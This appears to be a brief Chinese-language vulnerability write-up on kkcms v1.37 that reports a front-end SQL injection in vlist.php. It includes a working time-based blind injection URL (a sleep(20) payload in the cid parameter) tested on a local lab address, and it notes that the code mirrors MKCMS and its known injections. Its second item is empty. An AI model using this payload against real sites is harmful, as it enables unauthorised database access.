kkcms v1.37 前台SQL注入

某人扔了个github链接让看下有什么漏洞 https://github.com/Mengfanpro/kkcms

 

 过滤函数文件在\system\library.php

 

1、

 

 直接拼接SQL语句

http://192.168.186.128:8085/vlist.php?cid=1%20and%20(select*from(select(sleep(20)))a)--%20

延迟20S

 

 

2、

 

 

 

 

 看完这段我回忆了下其他，这不就是MKCMS吗？代码都一样

 

 对比了下kkcms和mkcms，两个差不多一样直接参考MKCMS的SQL注入就好了。反正MKCSM的注入这么多，以前有的，新版本也不会修